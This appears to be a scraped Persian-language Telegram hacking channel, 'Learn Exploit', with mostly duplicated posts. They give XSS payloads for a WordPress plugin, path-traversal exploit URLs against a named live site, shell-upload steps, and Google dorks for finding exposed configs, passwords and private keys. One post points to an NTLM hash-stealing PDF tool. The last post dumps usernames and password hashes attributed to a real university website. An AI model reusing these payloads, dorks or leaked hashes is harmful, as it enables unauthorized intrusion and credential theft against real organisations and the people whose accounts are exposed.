0Day.Today | Learn Exploit | Zero World | Dark web |
اموزش XSS در دو سطح low و medium #Xss #Learning in Two levels : #Low #Medium security ————— 0Day.Today boy's t.me/LearnExploit
اموزش XSS در دو سطح low و medium
#Xss #Learning in Two levels : #Low #Medium security
—————
بخش هایی که در این فیلم یاد میگیرید :
1 - تست نفوذ XSS در سطح low
2 - رفع این اسیب پذیری از سطح low به medium
3 - تست نفوذ XSS در سطح Medium
—————
Time : 6 min
Qul : 1080
file size : 36 mg
dl link : http://www.mediafire.com/file/sp8x511qm3bkw5p/Xss%20Learning.rar
—————
0Day.Today boy's
t.me/LearnExploit
#Xss #Learning in Two levels : #Low #Medium security
—————
بخش هایی که در این فیلم یاد میگیرید :
1 - تست نفوذ XSS در سطح low
2 - رفع این اسیب پذیری از سطح low به medium
3 - تست نفوذ XSS در سطح Medium
—————
Time : 6 min
Qul : 1080
file size : 36 mg
dl link : http://www.mediafire.com/file/sp8x511qm3bkw5p/Xss%20Learning.rar
—————
0Day.Today boy's
t.me/LearnExploit
MediaFire
Xss Learning
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
This media is not supported in your browser
VIEW IN TELEGRAM
POC
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
POC اسیب پذیریه XSS در پلاگین (All In One Favicon ) : #XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon 0Day.Today Boy's @LearnExploit
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
⚡1
اسیب پذیری (FTP2FTP ( Arbitrary File Download :
در این اسیب پذیری شما میتوانید تمام فایل هایی که توسط ادمین سایت اپلود شده است رو دانلود کنید !
—
Dork : inurl:/download2.php?id=
—
Exploit :
http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php
—
POC :
before exploit :
http://www.supersat.cz/download/azbox/download2.php?id=23
after exploit :
http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================
0Dya.Today Boy's
T.me/LearnExploit
در این اسیب پذیری شما میتوانید تمام فایل هایی که توسط ادمین سایت اپلود شده است رو دانلود کنید !
—
Dork : inurl:/download2.php?id=
—
Exploit :
http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php
—
POC :
before exploit :
http://www.supersat.cz/download/azbox/download2.php?id=23
after exploit :
http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================
0Dya.Today Boy's
T.me/LearnExploit
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
👍1
✔️ مکان #اطلاعات_مهم در سیستم لینوکس شما
/etc/resolv.conf
-> سرورهای فعلی (DNS) برای سیستم
/etc/motd
-> پیام روز
/etc/issue
-> نسخه فعلی توزیع لینوکس شما
/etc/passwd
-> فهرست کاربران محلی
/etc/shadow
-> لیست هشهای کلمه عبور کاربران (نیاز به دسترسی روت)
@LearnExploit
/etc/resolv.conf
-> سرورهای فعلی (DNS) برای سیستم
/etc/motd
-> پیام روز
/etc/issue
-> نسخه فعلی توزیع لینوکس شما
/etc/passwd
-> فهرست کاربران محلی
/etc/shadow
-> لیست هشهای کلمه عبور کاربران (نیاز به دسترسی روت)
@LearnExploit
اسیب پذیری فایل اپلود در پلاگین (Responsive Thumbnail Slider )
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
============
@LearnExploit
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
============
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
اسیب پذیری فایل اپلود در پلاگین (Responsive Thumbnail Slider ) WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit) ============ @LearnExploit
اسیب پذیری فایل اپلود در پلاگین (Responsive Thumbnail Slider )
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
============
Dorks :
inurl:"/wp-content/uploads/wp-responsive-images-thumbnail-slider/"
or
inurl:"/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt"
exploit :
https://www.exploit-db.com/exploits/45099/
depends :
Metasploit
============
0Day.Today
@LearnExploit
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
============
Dorks :
inurl:"/wp-content/uploads/wp-responsive-images-thumbnail-slider/"
or
inurl:"/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt"
exploit :
https://www.exploit-db.com/exploits/45099/
depends :
Metasploit
============
0Day.Today
@LearnExploit
Upload shell & SQLi :
~~~~~~~~~~~~~~~~~
Dorks#
|~
inurl:"post.php?p_id="
inurl:"/category.php?category="
—————————————-
Exploit#
|~
1 ) ابتدا در سایت ثبت نام کنید
2) وارد پنل خود شید
3) به مسیر /profile برید
4)شل خودتونو با shel.phtml اپلود کنید
5) مسیر شل :
http://[target]/assets/images/profile_pics/your shell.phtml
——————————————
— > @LearnExploit
~~~~~~~~~~~~~~~~~
Dorks#
|~
inurl:"post.php?p_id="
inurl:"/category.php?category="
—————————————-
Exploit#
|~
1 ) ابتدا در سایت ثبت نام کنید
2) وارد پنل خود شید
3) به مسیر /profile برید
4)شل خودتونو با shel.phtml اپلود کنید
5) مسیر شل :
http://[target]/assets/images/profile_pics/your shell.phtml
——————————————
— > @LearnExploit
اموزش کاتانا ! در کالی لینوکس 2018.2
#Script #Katana OS (#KALI 2018.2)
—————-
0Day.Today Boy's
T.me/LearnExploit
#Script #Katana OS (#KALI 2018.2)
—————-
0Day.Today Boy's
T.me/LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
اموزش کاتانا ! در کالی لینوکس 2018.2 #Script #Katana OS (#KALI 2018.2) —————- 0Day.Today Boy's T.me/LearnExploit
اموزش کاتانا ! در کالی لینوکس 2018.2
#Script #Katana OS (#KALI 2018.2)
—————-
در این اموزش یاد میگیرید :
1 - نحوه ی نصب روی کالی
2 - نحوه ی گرفتن whois
3 - پیدا کردن Cpanel
4 - اسنیف شبکه
Time : 7min
Dl link :
http://www.mediafire.com/file/q6b8cc76ysaacdf/katana.rar/file
—————-
0Day.Today Boy's
T.me/LearnExploit
#Script #Katana OS (#KALI 2018.2)
—————-
در این اموزش یاد میگیرید :
1 - نحوه ی نصب روی کالی
2 - نحوه ی گرفتن whois
3 - پیدا کردن Cpanel
4 - اسنیف شبکه
Time : 7min
Dl link :
http://www.mediafire.com/file/q6b8cc76ysaacdf/katana.rar/file
—————-
0Day.Today Boy's
T.me/LearnExploit
MediaFire
katana
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
Bad-Pdf - Steal NTLM Hashes With A PDF From Windows Machines.
[+] GitHub : https://github.com/deepzec/Bad-Pdf
#Uzi
@LearnExploit
[+] GitHub : https://github.com/deepzec/Bad-Pdf
#Uzi
@LearnExploit
اموزش کار با ابزار wafw00f در کالی برای تشخیص بودن یا نبودن firewall در سایت
#WaffW00f On #Kalilinux 2018.2
...
@LearnExploit
#WaffW00f On #Kalilinux 2018.2
...
@LearnExploit
This media is not supported in your browser
VIEW IN TELEGRAM
اموزش کار با ابزار wafw00f در کالی برای تشخیص بودن یا نبودن firewall در سایت
#WaffW00f On #Kalilinux 2018.2
...
@LearnExploit
#WaffW00f On #Kalilinux 2018.2
...
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
#Dork - #Server Info ————————— 0Day.Today Boy's @LearnExploit
#Dork - #Server Info
—————————
Dork ~ [
inurl:"debug/default/view?panel=config"
]
Describtions ~ [
با این دورک میتونید به اطلاعات یک سرور دسترسی داشته باشید
و حتی در برخی ها اطلاعاتی مانند username/password نیز موجود میباشد.
example ~ [
http://iphone.szczecin.pl/systemnapraw/frontend/web/debug/default/view?tag=5b5ecb5b2cc74&panel=request
]
—————————-
0Day.Today Boy's
@LearnExploit
—————————
Dork ~ [
inurl:"debug/default/view?panel=config"
]
Describtions ~ [
با این دورک میتونید به اطلاعات یک سرور دسترسی داشته باشید
و حتی در برخی ها اطلاعاتی مانند username/password نیز موجود میباشد.
example ~ [
http://iphone.szczecin.pl/systemnapraw/frontend/web/debug/default/view?tag=5b5ecb5b2cc74&panel=request
]
—————————-
0Day.Today Boy's
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
#Dork - #configuration_php #Pass and #User ————————— 0Day.Today Boy's @LearnExploit
#Dork - #configuration_php #Pass and #User
—————————
#Dork ~ [
inurl:configuration.php and intext:"var $password="
]
============
#Describtions ~ [
در این دورک میتونید اطلاعاتی از جمله :
/* Database Settings */
var $dbtype = 'mysql'; // Normally mysql
var $host = 'localhost'; // This is normally set to localhost
var $user = '******'; // MySQL username
var $password = '******';// MySQL password
var $db = '******'; // MySQL database name
var $dbprefix = 'jos_'; // Do not change unless you need to!
/* Server Settings */
var $secret = '**********'; //Change this to something more secure
var $gzip = '1';
var $error_reporting = '-1';
var $helpurl = 'help.joomla.org';
var $xmlrpc_server = '1';
var $ftp_host = '';
var $ftp_port = '';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $ftp_enable = '';
var $tmp_path = 'home/bukuku/public_html/tmp';
var $log_path = 'home/bukuku/public_html/logs';
var $offset = '0';
var $live_site = 'www.bukulawas.200u.com/'; // Optional, Full url to Joomla install.
var $force_ssl = 0; //Force areas of the site to be SSL ONLY. 0 = None, 1 = Administrator, 2 = Both Site and Administrator
برای نتیجه گیری مورد $user و $password سرچ کنید.
]
============
#example ~ [
http://internationalacademy.in/configuration.php-dist
]
—————————-
0Day.Today Boy's
@LearnExploit
—————————
#Dork ~ [
inurl:configuration.php and intext:"var $password="
]
============
#Describtions ~ [
در این دورک میتونید اطلاعاتی از جمله :
/* Database Settings */
var $dbtype = 'mysql'; // Normally mysql
var $host = 'localhost'; // This is normally set to localhost
var $user = '******'; // MySQL username
var $password = '******';// MySQL password
var $db = '******'; // MySQL database name
var $dbprefix = 'jos_'; // Do not change unless you need to!
/* Server Settings */
var $secret = '**********'; //Change this to something more secure
var $gzip = '1';
var $error_reporting = '-1';
var $helpurl = 'help.joomla.org';
var $xmlrpc_server = '1';
var $ftp_host = '';
var $ftp_port = '';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $ftp_enable = '';
var $tmp_path = 'home/bukuku/public_html/tmp';
var $log_path = 'home/bukuku/public_html/logs';
var $offset = '0';
var $live_site = 'www.bukulawas.200u.com/'; // Optional, Full url to Joomla install.
var $force_ssl = 0; //Force areas of the site to be SSL ONLY. 0 = None, 1 = Administrator, 2 = Both Site and Administrator
برای نتیجه گیری مورد $user و $password سرچ کنید.
]
============
#example ~ [
http://internationalacademy.in/configuration.php-dist
]
—————————-
0Day.Today Boy's
@LearnExploit
10 متدی که با استفاده از دورک ها میشه username / password اکانت ها رو بدست اورد !
10 #method for get the #user & #pass of #Accounts
—————————
#method_01 :
Dork :
intext:charset_test= email= default_persistent=
/=/=/=/=/=/=/
#method_02 : wordpress
Dork :
filetype:sql inurl:wpcontent/
backup-*
/=/=/=/=/=/=/
#method_03 : WWWBoard!
Dork :
inurl:/wwwboard/passwd.txt
/=/=/=/=/=/=/
#method_04 : FrontPage!
Dork :
ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"
/=/=/=/=/=/=/
#method_05 : Symfony!
Dork :
inurl:config/databases.yml -trac -trunk -"Google Code" -source
-repository
/=/=/=/=/=/=/
#method_06 : TeamSpeak!
Dork :
server-dbs "intitle:index of"
/=/=/=/=/=/=/
#method_07 : TeamSpeak2!
Dork :
inurl:Teamspeak2_RC2/server.log
/=/=/=/=/=/=/
#method_08 : Get Admin pass!
Dork :
"admin account info" filetype:log
/=/=/=/=/=/=/
#method_09 : Private keys!
Dork :
filetype:pem pem intext:private
/=/=/=/=/=/=/
#method_10 : The Dir of Passwords!
Dork :
intitle:"Index of..etc" passwd
/=/=/=/=/=/=/
—————————
0Day.Today Boy's
@LearnExploit
10 #method for get the #user & #pass of #Accounts
—————————
#method_01 :
Dork :
intext:charset_test= email= default_persistent=
/=/=/=/=/=/=/
#method_02 : wordpress
Dork :
filetype:sql inurl:wpcontent/
backup-*
/=/=/=/=/=/=/
#method_03 : WWWBoard!
Dork :
inurl:/wwwboard/passwd.txt
/=/=/=/=/=/=/
#method_04 : FrontPage!
Dork :
ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"
/=/=/=/=/=/=/
#method_05 : Symfony!
Dork :
inurl:config/databases.yml -trac -trunk -"Google Code" -source
-repository
/=/=/=/=/=/=/
#method_06 : TeamSpeak!
Dork :
server-dbs "intitle:index of"
/=/=/=/=/=/=/
#method_07 : TeamSpeak2!
Dork :
inurl:Teamspeak2_RC2/server.log
/=/=/=/=/=/=/
#method_08 : Get Admin pass!
Dork :
"admin account info" filetype:log
/=/=/=/=/=/=/
#method_09 : Private keys!
Dork :
filetype:pem pem intext:private
/=/=/=/=/=/=/
#method_10 : The Dir of Passwords!
Dork :
intitle:"Index of..etc" passwd
/=/=/=/=/=/=/
—————————
0Day.Today Boy's
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
10 متدی که با استفاده از دورک ها میشه username / password اکانت ها رو بدست اورد ! 10 #method for get the #user & #pass of #Accounts ————————— #method_01 : Dork : intext:charset_test= email= default_persistent= /=/=/=/=/=/=/ #method_02 : wordpress Dork :…
#target use/pass members informations
——[
site : https://www.physik.uni-goettingen.de
]——
——[
lqp:jhfapr3fbWp8U
holm:jhSXiXTfj93as
schubert:jhsVTfx2wOORc
bibl:Y63ZMBvMaF1yw
ue:jhFtoinjltENg
buch:qLzG84Izn.8Qc
profile:Aa062OKUQ.n4E
admin:dKXkZY9toouwo
skript:DxVOPnrARlZO6
statphys:zKkE.yM58YQHQ
msdnaa:mQV0tuLa5RfXc
disp0:$apr1$SZJiD7lh$aVJNzX1haaOjW3X/LKnCI.
disp6:$apr1$f1WmW8YJ$IAjTJ0I5RggUukFmoeLo/1
disp7:$apr1$v9m1oACO$7jh69QAXFyAwhlUGY4fa40
disp8:$apr1$dclaXhiu$x0svHZxs.6a3gTXXddERf.
]——
——[
site : https://www.physik.uni-goettingen.de
]——
——[
lqp:jhfapr3fbWp8U
holm:jhSXiXTfj93as
schubert:jhsVTfx2wOORc
bibl:Y63ZMBvMaF1yw
ue:jhFtoinjltENg
buch:qLzG84Izn.8Qc
profile:Aa062OKUQ.n4E
admin:dKXkZY9toouwo
skript:DxVOPnrARlZO6
statphys:zKkE.yM58YQHQ
msdnaa:mQV0tuLa5RfXc
disp0:$apr1$SZJiD7lh$aVJNzX1haaOjW3X/LKnCI.
disp6:$apr1$f1WmW8YJ$IAjTJ0I5RggUukFmoeLo/1
disp7:$apr1$v9m1oACO$7jh69QAXFyAwhlUGY4fa40
disp8:$apr1$dclaXhiu$x0svHZxs.6a3gTXXddERf.
]——
Georg-August Universität Göttingen
Fakultät für Physik - Georg-August-Universität Göttingen
Webseiten der Georg-August-Universität Göttingen